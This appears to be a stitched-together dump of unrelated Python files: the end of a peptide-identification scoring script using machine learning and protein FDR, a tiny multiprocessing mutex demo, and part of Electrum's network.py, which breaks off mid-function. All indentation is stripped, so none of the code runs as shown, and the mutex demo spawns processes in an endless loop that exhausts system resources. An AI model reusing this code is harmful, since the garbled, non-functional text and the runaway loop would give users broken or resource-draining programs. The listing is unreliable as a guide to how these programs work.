df1['ids'] = df1['iorig'].apply(lambda x: ids[x])
df1['Is'] = df1['iorig'].apply(lambda x: Is[x])
df1['Scans'] = df1['iorig'].apply(lambda x: Scans[x])
df1['Isotopes'] = df1['iorig'].apply(lambda x: Isotopes[x])
df1['mzraw'] = df1['iorig'].apply(lambda x: mzraw[x])
df1['rt'] = df1['iorig'].apply(lambda x: rts[x])
df1['av'] = df1['iorig'].apply(lambda x: avraw[x])
df1['ch'] = df1['iorig'].apply(lambda x: charges[x])
df1['im'] = df1['iorig'].apply(lambda x: imraw[x])
df1['mass_diff'] = mass_diff
df1['rt_diff'] = rt_diff
df1['decoy'] = df1['seqs'].apply(lambda x: all(z.startswith(prefix) for z in pept_prot[x]))
df1['peptide'] = df1['seqs']
mass_dict = {}
pI_dict = {}
charge_dict = {}
for pep in set(df1['peptide']):
try:
mass_dict[pep] = mass.fast_mass2(pep)
pI_dict[pep] = electrochem.pI(pep)
charge_dict[pep] = electrochem.charge(pep, pH=7.0)
except:
mass_dict[pep] = 0
pI_dict[pep] = 0
charge_dict[pep] = 0
df1['plen'] = df1['peptide'].apply(lambda z: len(z))
df1['mass'] = df1['peptide'].apply(lambda x: mass_dict[x])
df1['pI'] = df1['peptide'].apply(lambda x: pI_dict[x])
df1['charge_theor'] = df1['peptide'].apply(lambda x: charge_dict[x])
df1['rt_diff_abs'] = df1['rt_diff'].abs()
df1['rt_diff_abs_pdiff'] = df1['rt_diff_abs'] - df1.groupby('ids')['rt_diff_abs'].transform('median')
df1['rt_diff_abs_pnorm'] = df1['rt_diff_abs'] / (df1.groupby('ids')['rt_diff_abs'].transform('sum') + 1e-2)
df1['id_count'] = df1.groupby('ids')['mass_diff'].transform('count')
df1['seq_count'] = df1.groupby('peptide')['mass_diff'].transform('count')
df1t5 = df1.sort_values(by='Is', ascending=False).copy()
df1t5 = df1t5.drop_duplicates(subset='peptide', keep='first')
if args['ml']:
print('Start Machine Learning on PFMs...')
print('Features used for MachineLearning: ', get_features_pfms(df1))
MAX_EVALS = 25
out_file = 'test_randomCV_PFMs_2.tsv'
of_connection = open(out_file, 'w')
writer = csv.writer(of_connection)
# Write column names
headers = ['auc', 'params', 'iteration', 'all_res']
writer.writerow(headers)
of_connection.close()
random_results = random_search_pfms(df1, param_grid, out_file, MAX_EVALS)
random_results = pd.read_csv(out_file)
random_results = random_results[random_results['auc'] != 'auc']
random_results['params'] = random_results['params'].apply(lambda x: ast.literal_eval(x))
convert_dict = {'auc': float,
}
random_results = random_results.astype(convert_dict)
bestparams = random_results.sort_values(by='auc',ascending=False)['params'].values[0]
bestparams['num_threads'] = args['nproc']
print(random_results.sort_values(by='auc',ascending=False)['auc'].values[0])
groups = df1['peptide']
ix = df1.index.values
unique = np.unique(groups)
np.random.RandomState(SEED).shuffle(unique)
result = []
for split in np.array_split(unique, 3):
mask = groups.isin(split)
train, test = ix[~mask], ix[mask]
train_df = df1.iloc[train]
test_df = df1.iloc[test]
feature_columns = list(get_features_pfms(train_df))
model = get_cat_model_final_pfms(train_df, bestparams, feature_columns)
df1.loc[test, 'preds'] = model.predict(get_X_array(test_df, feature_columns))
else:
df1['preds'] = np.power(df1['mass_diff'], 2) + np.power(df1['rt_diff'], 2)
df1['qpreds'] = pd.qcut(df1['preds'], 10, labels=range(10))
df1['proteins'] = df1['seqs'].apply(lambda x: ';'.join(pept_prot[x]))
df1.to_csv(base_out_name + '_PFMs_ML.tsv', sep='\t', index=False)
resdict['qpreds'] = df1['qpreds'].values
resdict['ids'] = df1['ids'].values
mass_diff = resdict['qpreds']
rt_diff = resdict['qpreds']
p1 = set(resdict['seqs'])
prots_spc2 = defaultdict(set)
for pep, proteins in pept_prot.items():
if pep in p1:
for protein in proteins:
prots_spc2[protein].add(pep)
for k in protsN:
if k not in prots_spc2:
prots_spc2[k] = set([])
prots_spc = dict((k, len(v)) for k, v in prots_spc2.items())
names_arr = np.array(list(prots_spc.keys()))
v_arr = np.array(list(prots_spc.values()))
n_arr = np.array([protsN[k] for k in prots_spc])
top100decoy_score = [prots_spc.get(dprot, 0) for dprot in protsN if isdecoy_key(dprot)]
top100decoy_N = [val for key, val in protsN.items() if isdecoy_key(key)]
p = np.mean(top100decoy_score) / np.mean(top100decoy_N)
print('p=%s' % (np.mean(top100decoy_score) / np.mean(top100decoy_N)))
prots_spc = dict()
all_pvals = calc_sf_all(v_arr, n_arr, p)
for idx, k in enumerate(names_arr):
prots_spc[k] = all_pvals[idx]
final_iteration(resdict, mass_diff, rt_diff, pept_prot, protsN, base_out_name, prefix, isdecoy, isdecoy_key, escore, fdr, args['nproc'], fname)
def worker(qin, qout, mass_diff, rt_diff, resdict, protsN, pept_prot, isdecoy_key, isdecoy, fdr, prots_spc_basic2, win_sys=False):
for item in (iter(qin.get, None) if not win_sys else qin):
mass_koef, rtt_koef = item
e_ind = mass_diff <= mass_koef
resdict2 = filter_results(resdict, e_ind)
features_dict = dict()
for pep in set(resdict2['seqs']):
for bprot in pept_prot[pep]:
prot_score = prots_spc_basic2[bprot]
if prot_score > features_dict.get(pep, [-1, ])[-1]:
features_dict[pep] = (bprot, prot_score)
prots_spc_basic = dict()
p1 = set(resdict2['seqs'])
pep_pid = defaultdict(set)
pid_pep = defaultdict(set)
banned_dict = dict()
for pep, pid in zip(resdict2['seqs'], resdict2['ids']):
# for pep, pid in zip(resdict2['seqs'], [ids[iorig] for iorig in resdict2['iorig']]):
pep_pid[pep].add(pid)
pid_pep[pid].add(pep)
if pep in banned_dict:
banned_dict[pep] += 1
else:
banned_dict[pep] = 1
if len(p1):
prots_spc_final = dict()
prots_spc_copy = False
prots_spc2 = False
unstable_prots = set()
p0 = False
names_arr = False
tmp_spc_new = False
decoy_set = False
while 1:
if not prots_spc2:
best_match_dict = dict()
n_map_dict = defaultdict(list)
for k, v in protsN.items():
n_map_dict[v].append(k)
decoy_set = set()
for k in protsN:
if isdecoy_key(k):
decoy_set.add(k)
decoy_set = list(decoy_set)
prots_spc2 = defaultdict(set)
for pep, proteins in pept_prot.items():
if pep in p1:
for protein in proteins:
if protein == features_dict[pep][0]:
prots_spc2[protein].add(pep)
for k in protsN:
if k not in prots_spc2:
prots_spc2[k] = set([])
prots_spc2 = dict(prots_spc2)
unstable_prots = set(prots_spc2.keys())
top100decoy_N = sum([val for key, val in protsN.items() if isdecoy_key(key)])
names_arr = np.array(list(prots_spc2.keys()))
n_arr = np.array([protsN[k] for k in names_arr])
tmp_spc_new = dict((k, len(v)) for k, v in prots_spc2.items())
top100decoy_score_tmp = [tmp_spc_new.get(dprot, 0) for dprot in decoy_set]
top100decoy_score_tmp_sum = float(sum(top100decoy_score_tmp))
tmp_spc = tmp_spc_new
prots_spc = tmp_spc_new
if not prots_spc_copy:
prots_spc_copy = deepcopy(prots_spc)
for idx, v in enumerate(decoy_set):
if v in unstable_prots:
top100decoy_score_tmp_sum -= top100decoy_score_tmp[idx]
top100decoy_score_tmp[idx] = prots_spc.get(v, 0)
top100decoy_score_tmp_sum += top100decoy_score_tmp[idx]
p = float(sum(top100decoy_score_tmp)) / top100decoy_N
p = top100decoy_score_tmp_sum / top100decoy_N
if not p0:
p0 = float(p)
n_change = set(protsN[k] for k in unstable_prots)
for n_val in n_change:
for k in n_map_dict[n_val]:
v = prots_spc[k]
if n_val not in best_match_dict or v > prots_spc[best_match_dict[n_val]]:
best_match_dict[n_val] = k
n_arr_small = []
names_arr_small = []
v_arr_small = []
for k, v in best_match_dict.items():
n_arr_small.append(k)
names_arr_small.append(v)
v_arr_small.append(prots_spc[v])
prots_spc_basic = dict()
all_pvals = calc_sf_all(np.array(v_arr_small), n_arr_small, p)
for idx, k in enumerate(names_arr_small):
prots_spc_basic[k] = all_pvals[idx]
best_prot = utils.keywithmaxval(prots_spc_basic)
best_score = prots_spc_basic[best_prot]
unstable_prots = set()
if best_prot not in prots_spc_final:
prots_spc_final[best_prot] = best_score
banned_pids = set()
for pep in prots_spc2[best_prot]:
for pid in pep_pid[pep]:
banned_pids.add(pid)
for pid in banned_pids:
for pep in pid_pep[pid]:
banned_dict[pep] -= 1
if banned_dict[pep] == 0:
best_prot_val = features_dict[pep][0]
for bprot in pept_prot[pep]:
if bprot == best_prot_val:
tmp_spc_new[bprot] -= 1
unstable_prots.add(bprot)
else:
v_arr = np.array([prots_spc[k] for k in names_arr])
all_pvals = calc_sf_all(v_arr, n_arr, p)
for idx, k in enumerate(names_arr):
prots_spc_basic[k] = all_pvals[idx]
for k, v in prots_spc_basic.items():
if k not in prots_spc_final:
prots_spc_final[k] = v
break
try:
prot_fdr = aux.fdr(prots_spc_final.items(), is_decoy=isdecoy)
except ZeroDivisionError:
prot_fdr = 100.0
if prot_fdr >= 12.5 * fdr:
v_arr = np.array([prots_spc[k] for k in names_arr])
all_pvals = calc_sf_all(v_arr, n_arr, p)
for idx, k in enumerate(names_arr):
prots_spc_basic[k] = all_pvals[idx]
for k, v in prots_spc_basic.items():
if k not in prots_spc_final:
prots_spc_final[k] = v
break
if mass_koef == 9:
item2 = prots_spc_copy
else:
item2 = False
if not win_sys:
qout.put((prots_spc_final, item2))
else:
qout.append((prots_spc_final, item2))
if not win_sys:
qout.put(None)
else:
return qout
|
mutex.py | from multiprocessing import Process, Lock
mutex = Lock()
def processData(data):
with mutex:
print(data)
if __name__ == '__main__':
while True:
some_data = "This is the data"
p = Process(target = processData, args = (some_data,))
p.start() |
network.py | # Electrum - Lightweight Electrum Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import queue
import os
import stat
import errno
import random
import re
import select
from collections import defaultdict
import threading
import socket
import json
import socks
from . import util
from . import bitcoin
from .bitcoin import *
from .blockchain import *
from . import constants
from .interface import Connection, Interface
from . import blockchain
from .version import ELECTRUM_VERSION, PROTOCOL_VERSION
from .i18n import _
from . import constants
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
from .version import PROTOCOL_VERSION
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = constants.net.DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
def filter_version(servers):
def is_recent(version):
try:
return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = constants.net.DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'), p.get('host'), p.get('port'),
p.get('user', ''), p.get('password', '')])
def deserialize_proxy(s):
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
def deserialize_server(server_str):
host, port, protocol = str(server_str).rsplit(':', 2)
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server', None)
# Sanitize default server
if self.default_server:
try:
deserialize_server(self.default_server)
except:
self.print_error('Warning: failed to parse server-string; falling back to random.')
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
dir_path = os.path.join( self.config.path, 'certs')
if not os.path.exists(dir_path):
os.mkdir(dir_path)
os.chmod(dir_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# subscriptions and requests
self.subscribed_addresses = set()
self.h2addr = {}
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.requested_chunks = set()
self.socket_queue = queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r", encoding='utf-8') as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w", encoding='utf-8') as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_downloading(self):
return self.connection_status == 'downloading'
def is_syncing(self):
return self.connection_status == 'syncing'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
if self.interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, self.interface)
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
self.queue_request('server.donation_address', [])
self.queue_request('server.peers.subscribe', [])
self.request_fee_estimates()
self.queue_request('blockchain.relayfee', [])
for h in list(self.subscribed_addresses):
self.queue_request('blockchain.scripthash.subscribe', [h])
def request_fee_estimates(self):
from .simple_config import FEE_ETA_TARGETS
self.config.requested_fee_estimates()
self.queue_request('mempool.get_fee_histogram', [])
for i in FEE_ETA_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'fee_histogram':
value = self.config.mempool_fees
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
out = constants.net.DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
if (not server in self.interfaces and not server in self.connecting):
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_socketobject"):
socket._socketobject = socket.socket
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'mempool.get_fee_histogram':
if error is None:
self.print_error('fee_histogram', result)
self.config.mempool_fees = result
self.notify('fee_histogram')
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.update_fee_estimates(i, fee)
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN) if result is not None else None
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.headers':
height, count = params
if count == 1:
self.on_get_header(interface, response, height)
elif count == CHUNK_LEN:
self.on_get_chunk(interface, response, height)
else:
self.print_error('Unknown chunk lenght: %s' % count)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.scripthash.subscribe':
self.subscribed_addresses.add(params[0])
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.scripthash.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
def addr_to_scripthash(self, addr):
h = bitcoin.address_to_scripthash(addr)
if h not in self.h2addr:
self.h2addr[h] = addr
return h
def overload_cb(self, callback):
def cb2(x):
x2 = x.copy()
p = x2.pop('params')
addr = self.h2addr[p[0]]
x2['params'] = [addr]
callback(x2)
return cb2
def subscribe_to_addresses(self, addresses, callback):
hashes = [self.addr_to_scripthash(addr) for addr in addresses]
msgs = [('blockchain.scripthash.subscribe', [x]) for x in hashes]
self.send(msgs, self.overload_cb(callback))
def request_address_history(self, address, callback):
h = self.addr_to_scripthash(address)
self.send([('blockchain.scripthash.get_history', [h])], self.overload_cb(callback))
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
self.pending_sends.append((messages, callback))
def process_pending_sends(self):
# Requests needs connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None:
self.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
self.queue_request('blockchain.headers.subscribe', [True], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
# must use copy of values
for interface in list(self.interfaces.values()):
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
else:
if self.config.is_fee_estimates_update_required():
self.request_fee_estimates()
def request_chunk(self, interface, index):
if index in self.requested_chunks:
return
interface.print_error("requesting chunk %d" % index)
self.requested_chunks.add(index)
self.queue_request('blockchain.block.headers',
[CHUNK_LEN*index, CHUNK_LEN], interface)
def on_get_chunk(self, interface, response, height):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
blockchain = interface.blockchain
if result is None or error is not None:
interface.print_error(error or 'bad response')
return
index = height // CHUNK_LEN
# Ignore unsolicited chunks
if index not in self.requested_chunks:
interface.print_error("received chunk %d (unsolicited)" % index)
return
else:
interface.print_error("received chunk %d" % index)
self.requested_chunks.remove(index)
hex_chunk = result.get('hex', None)
connect = blockchain.connect_chunk(index, hex_chunk)
if not connect:
self.connection_down(interface.server)
return
# If not finished, get the next chunk
if index >= len(blockchain.checkpoints) and blockchain.height() < interface.tip:
if not self.is_syncing():
self.set_status('syncing')
self.request_chunk(interface, index+1)
else:
if(self.is_syncing()):
self.set_status('connected')
interface.mode = 'default'
interface.print_error('catch up done', blockchain.height())
blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
self.queue_request('blockchain.block.headers', [height, 1], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response, height):
'''Handle receiving a single block header'''
result = response.get('result', {})
hex_header = result.get('hex', None)
if interface.request != height:
interface.print_error("unsolicited header",interface.request, height)
self.connection_down(interface.server)
return
if not hex_header:
interface.print_error(response)
self.connection_down(interface.server)
return
if len(hex_header) != get_header_size(height)*2:
